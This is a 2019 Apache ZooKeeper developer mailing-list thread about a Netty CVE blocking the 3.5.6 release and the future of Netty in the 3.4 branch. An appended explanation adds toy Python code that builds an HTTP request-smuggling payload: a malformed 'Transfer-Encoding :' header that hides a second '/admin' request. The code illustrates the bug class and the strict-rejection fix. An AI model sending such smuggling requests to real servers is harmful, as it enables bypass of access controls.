zookeeper-dev mailing list archives

From Patrick Hunt <ph...@apache.org>
Subject Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
Date Wed, 02 Oct 2019 15:47:54 GMT
On Wed, Oct 2, 2019 at 1:49 AM Andor Molnar <andor@apache.org> wrote:

> Hi Pat,
>
> Would you please clarify what you mean by “dropping netty support from
> 3.4”?
>
>
My simplistic thought was just that. Ship new versions of 3.4 that remove
support for netty. That could mean turning it off by default (not sure how
much work that would be) or just purging the netty code from the codebase
entirely (3.4). It would be an exception to our "don't break b/w compat
in fix releases" policy, but this is an extreme case imo. We have no
intention of supporting netty in 3.4 going forward as evidenced by the fact
that the netty version is locked to netty 3 (long out of support by netty
as they are no longer backporting fixes) and we have no intention of
updating to the new version of netty on 3.4. Maybe this CVE doesn't affect
us, but at some point it will. Users have the option to move to a stable,
b/w compat, 3.5 release. Not optimal I agree.


> Does that mean we won’t submit security patches from now on, but keep the
> Netty classes (NettyServerCnxnFactory and ClientCnxnSocketNetty) available
> OR remove these classes from the codebase?
>
> The latter means we’ll drop client SSL feature too.
>
>
Say there is a new CVE on netty and it's not backported to netty3, what
would we do in that case? I guess we could wait/kick the can down the road
till we really hit that. For the moment just say that it doesn't affect us
as you researched and add to 3.4 exceptions.

This is just my suggestion/option rather than a recommendation, open to
other ideas. ;-)

Patrick


> Andor
>
>
>
> > On 2019. Oct 2., at 2:27, Michael Han <hanm@apache.org> wrote:
> >
> > >>> How about officially dropping netty support from 3.4 and asking people to move to the new version
> > > +1. This sounds like a good opportunity to deprecate the 3.4 branch.
> >
> > On Tue, Oct 1, 2019 at 8:00 AM Enrico Olivelli <eolivelli@gmail.com> wrote:
> >
> >> On Tue, 1 Oct 2019 at 16:15 Patrick Hunt <phunt@apache.org> wrote:
> >>
> >>> Another option/solution: How about officially dropping netty support from
> >>> 3.4 and asking people to move to the new version (3.5 stable or later)?
> >>>
> >>
> >> Sounds good
> >>
> >> Enrico
> >>
> >>
> >>>
> >>> Patrick
> >>>
> >>> On Tue, Oct 1, 2019 at 4:22 AM Andor Molnar <andor@apache.org> wrote:
> >>>
> >>>> I agree that 3.4 should not be refactored in any way even for a security
> >>>> fix.
> >>>>
> >>>> What's wrong with the "alpha story"?
> >>>>
> >>>> I think releasing in an early stage with "-alpha", "-beta" modifiers is
> >>>> not a bad thing alone, as long as it doesn't take years to get to the
> >>>> stable release.
> >>>>
> >>>> Andor
> >>>>
> >>>>
> >>>> On Tue, 1 Oct 2019, Enrico Olivelli wrote:
> >>>>
> >>>>> Date: Tue, 1 Oct 2019 10:54:24 +0200
> >>>>> From: Enrico Olivelli <eolivelli@gmail.com>
> >>>>> Reply-To: dev@zookeeper.apache.org
> >>>>> To: dev@zookeeper.apache.org
> >>>>> Subject: Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
> >>>>>
> >>>>> On Tue, 1 Oct 2019, 10:38 Andor Molnar <andor@apache.org> wrote:
> >>>>>
> >>>>>> Backporting Netty 4 would be a huge, cumbersome task, I hope we don’t
> >>>>>> have to do it.
> >>>>>>
> >>>>>
> >>>>> Yes, 3.4 is mature and stable and closed for refactors.
> >>>>>
> >>>>>
> >>>>>> However I had a quick look at the details of this CVE and it seems to me
> >>>>>> that it only affects the HTTP codec:
> >>>>>>
> >>>>>> https://github.com/netty/netty/commit/39cafcb05c99f2aa9fce7e6597664c9ed6a63a95
> >>>>>>
> >>>>>> Can’t we just say 3.4.14 is not affected?
> >>>>>> We’re not running HTTP server inside ZooKeeper.
> >>>>>>
> >>>>>> Otherwise we might be able to release 3.6.0-alpha1 now, put a date for
> >>>>>> 3.4 EOL and highlight on the webpage that this
> >>>>>>
> >>>>>
> >>>>> Please do not start an 'alpha' story like for 3.5....
> >>>>>
> >>>>>> CVE probably won’t be resolved on that branch, please upgrade to 3.5.
> >>>>>>
> >>>>>
> >>>>> +1
> >>>>>
> >>>>>
> >>>>> Enrico
> >>>>>
> >>>>>>
> >>>>>> As a third option we could ask Norman to kindly fix 3.10.6.Final as
> >>>>>> well… or submit a PR ourselves, it doesn’t seem to me a big deal.
> >>>>>>
> >>>>>
> >>>>> Not so useful
> >>>>>
> >>>>>>
> >>>>>> What do you think?
> >>>>>>
> >>>>>> Andor
> >>>>>>
> >>>>>>
> >>>>>>
> >>>>>>
> >>>>>>> On 2019. Oct 1., at 2:00, Patrick Hunt <phunt@apache.org> wrote:
> >>>>>>>
> >>>>>>> I pushed patches for 3.5 and trunk and the tests passed on my mac.
> >>>>>>> However 3.4 is using netty 3.10.6.Final and as such it's not a simple
> >>>>>>> upgrade. (there are no fixes against 3.10 for this CVE, at least not so
> >>>>>>> far) Not sure what we want to do about this... someone would need to
> >>>>>>> backport the netty 4.1 changes into 3.4 afaict.
> >>>>>>>
> >>>>>>> Patrick
> >>>>>>>
> >>>>>>> On Mon, Sep 30, 2019 at 1:08 PM Patrick Hunt <phunt@apache.org> wrote:
> >>>>>>>
> >>>>>>>> I'll work on it today.
> >>>>>>>>
> >>>>>>>> Patrick
> >>>>>>>>
> >>>>>>>> On Mon, Sep 30, 2019 at 11:59 AM Enrico Olivelli <eolivelli@gmail.com>
> >>>>>>>> wrote:
> >>>>>>>>
> >>>>>>>>> Okay
> >>>>>>>>>
> >>>>>>>>> I am cancelling the release.
> >>>>>>>>>
> >>>>>>>>> I have a problem with my box, I can't work on netty upgrade.
> >>>>>>>>>
> >>>>>>>>> Any volunteer?
> >>>>>>>>>
> >>>>>>>>> Enrico
> >>>>>>>>>
> >>>>>>>>> On Mon, 30 Sep 2019, 20:32 Andor Molnar <andor@apache.org> wrote:
> >>>>>>>>>
> >>>>>>>>>> The good news is: we need to release 3.4.15 too. :)
> >>>>>>>>>>
> >>>>>>>>>> Andor
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>> On 2019. Sep 30., at 20:26, Patrick Hunt <phunt@apache.org> wrote:
> >>>>>>>>>>>
> >>>>>>>>>>> created: https://issues.apache.org/jira/browse/ZOOKEEPER-3563
> >>>>>>>>>>>
> >>>>>>>>>>> On Mon, Sep 30, 2019 at 11:20 AM Patrick Hunt <phunt@apache.org>
> >>>>>>>>>>> wrote:
> >>>>>>>>>>>
> >>>>>>>>>>>> -1 - when I run dependency check on the release candidate artifact
> >>>>>>>>>>>> it's failing with:
> >>>>>>>>>>>>
> >>>>>>>>>>>> [ERROR] netty-transport-4.1.29.Final.jar: CVE-2019-16869
> >>>>>>>>>>>>
> >>>>>>>>>>>> I ran this on trunk and it's passing, as such it must be an issue
> >>>>>>>>>>>> with the 3.5.6 netty version specifically. It's listed as a high,
> >>>>>>>>>>>> we should patch this as well before releasing.
> >>>>>>>>>>>>
> >>>>>>>>>>>> Patrick
> >>>>>>>>>>>>
> >>>>>>>>>>>>
> >>>>>>>>>>>> On Sun, Sep 29, 2019 at 7:29 AM Enrico Olivelli <eolivelli@gmail.com>
> >>>>>>>>>>>> wrote:
> >>>>>>>>>>>>
> >>>>>>>>>>>>> This is a bugfix release candidate for 3.5.6.
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> It fixes 28 issues, including upgrade of third party libraries,
> >>>>>>>>>>>>> TTL Node APIs for C API, support for PKCS12 Keystores, and better
> >>>>>>>>>>>>> procedure for the upgrade of servers from 3.4 to 3.5.
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> The full release notes are available at:
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12310801&version=12345243
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> *** Please download, test and vote by October 2nd 2019, 23:59 UTC+0. ***
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Source files:
> >>>>>>>>>>>>> https://people.apache.org/~eolivelli/zookeeper-3.5.6-candidate-2
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Maven staging repo:
> >>>>>>>>>>>>> https://repository.apache.org/content/repositories/orgapachezookeeper-1042/
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> The release candidate tag in git to be voted upon: release-3.5.6-rc2
> >>>>>>>>>>>>> https://github.com/apache/zookeeper/tree/release-3.5.6-rc2
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> ZooKeeper's KEYS file containing PGP keys we use to sign the release:
> >>>>>>>>>>>>> https://www.apache.org/dist/zookeeper/KEYS
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Should we release this candidate?
> >>>>>>>>>>>>> Enrico Olivelli
> >>>>>>>>>>>>>
> >>>>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>
> >>>>>>>>
> >>>>>>
> >>>>>>
> >>>>>
> >>>
> >>
>
>
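Andor's argument in the quoted thread is that CVE-2019-16869 lives in Netty's HTTP codec (the commit he links is the upstream fix; Netty shipped it in 4.1.42.Final), and that ZooKeeper does not run an HTTP server, so the question for the 3.4 line is whether that decoder is ever on the wire. To make concrete what the codec bug class is, here is an added example that is not code from this thread, from Netty or from ZooKeeper: a toy Python HTTP/1.1 framer that treats a space before the colon in a header field-name three ways. The 'trim' mode is an illustration of the lenient behaviour the CVE describes (whitespace before the colon tolerated, so a "Transfer-Encoding : chunked" line is honoured); 'ignore' is an assumed upstream peer that does not recognise the malformed name and falls back to Content-Length; 'reject' is what RFC 7230 section 3.2.4 requires. The request bytes are constructed, not captured, and the mode names and functions are mine, not Netty's API.

```python
import re

# RFC 7230 section 3.2.6 "token" characters: the only ones allowed in a
# header field-name. Whitespace is not among them.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


class BadRequest(Exception):
    """Raised by the 'reject' parser when a header line is malformed."""


def parse_headers(header_block: bytes, mode: str) -> list:
    """Parse CRLF-separated header lines into (lowercased-name, value) pairs.

    mode selects how a field-name that is not a valid token (e.g. one with
    a space before the colon) is treated:
      'trim'   - strip the whitespace and use the name anyway (illustrative
                 lenient behaviour, not Netty's actual decoder code)
      'ignore' - keep the name exactly as sent, so 'transfer-encoding ' is
                 simply an unrecognised header (assumed upstream peer)
      'reject' - refuse the message, as RFC 7230 section 3.2.4 requires
    """
    headers = []
    for line in header_block.split(b"\r\n"):
        if not line:
            continue
        name, _, value = line.decode("latin-1").partition(":")
        if not _TOKEN.match(name):
            if mode == "reject":
                raise BadRequest("illegal header field-name %r" % name)
            if mode == "trim":
                name = name.strip()
        headers.append((name.lower(), value.strip()))
    return headers


def frame_request(raw: bytes, mode: str) -> tuple:
    """Split one HTTP/1.1 request off the front of `raw`.

    Returns (body, leftover). The leftover is what a keep-alive server
    would parse as the *next* request on the same connection.
    """
    head, _, rest = raw.partition(b"\r\n\r\n")
    _request_line, _, header_block = head.partition(b"\r\n")
    headers = dict(parse_headers(header_block, mode))
    if headers.get("transfer-encoding") == "chunked":
        body = b""
        while True:
            size_line, _, rest = rest.partition(b"\r\n")
            size = int(size_line, 16)
            if size == 0:
                _, _, rest = rest.partition(b"\r\n")  # consume final CRLF
                return body, rest
            body += rest[:size]
            rest = rest[size + 2:]  # skip chunk data plus its trailing CRLF
    length = int(headers.get("content-length", "0"))
    return rest[:length], rest[length:]


def build_smuggling_request() -> bytes:
    """Constructed sample request (not captured traffic).

    Content-Length covers the whole body; the malformed 'Transfer-Encoding :'
    line is only honoured by a parser that trims the field-name.
    """
    smuggled = b"GET /admin HTTP/1.1\r\nHost: example\r\n\r\n"
    body = b"0\r\n\r\n" + smuggled  # zero-length chunk, then a second request
    return (b"POST / HTTP/1.1\r\n"
            b"Host: example\r\n"
            b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n"
            b"Transfer-Encoding : chunked\r\n"
            b"\r\n" + body)


def accepted(raw: bytes, mode: str) -> bool:
    """True if a parser in `mode` processes `raw` instead of rejecting it."""
    try:
        frame_request(raw, mode)
        return True
    except BadRequest:
        return False


if __name__ == "__main__":
    raw = build_smuggling_request()
    for mode in ("ignore", "trim"):
        body, leftover = frame_request(raw, mode)
        print("%-6s body=%d bytes leftover=%r" % (mode, len(body), leftover[:20]))
    print("reject accepts request:", accepted(raw, "reject"))
```

Run as a script, it shows the same bytes framed two different ways: 'ignore' consumes the whole body and leaves nothing, while 'trim' sees an empty chunked body and leaves a second "GET /admin" request queued on the connection. That disagreement about where one request ends is the request-smuggling primitive behind the CVE, and 'reject' is the only mode that closes it. None of this is reachable unless an HTTP decoder is actually parsing bytes off the socket, which is exactly what the "we're not running an HTTP server inside ZooKeeper" reasoning above turns on.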
